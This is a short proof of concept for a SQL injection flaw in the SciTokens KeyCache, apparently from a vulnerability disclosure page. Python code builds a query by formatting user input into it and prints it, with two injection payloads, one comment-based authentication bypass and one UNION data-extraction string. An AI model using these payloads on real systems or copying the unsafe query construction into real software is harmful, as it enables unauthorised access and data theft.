CVE-2026-32714 SciTokens SQL注入漏洞

import sqlite3 # Simulating the vulnerable KeyCache behavior prior to 1.9.6 def vulnerable_sql_construction(user_issuer, user_key_id): # The vulnerability lies in using str.format() directly with user input # instead of using parameterized queries (? or %s). query_template = "SELECT * FROM keys WHERE issuer = '{issuer}' AND key_id = '{key_id}'" # This is the vulnerable line malicious_query = query_template.format(issuer=user_issuer, key_id=user_key_id) print(f"[VULNERABLE] Generated Query: {malicious_query}") # In the real scenario, conn.execute(malicious_query) would run here return malicious_query # PoC 1: Tautology attack to bypass logic print("--- PoC 1: Authentication Bypass ---") payload_issuer = "admin' --" vulnerable_sql_construction(payload_issuer, "any_key_id") # PoC 2: Data extraction via UNION print("\n--- PoC 2: Data Extraction ---") payload_extract = "admin' UNION SELECT 1, sqlite_version(), 3 -- " vulnerable_sql_construction(payload_extract, "any_key_id")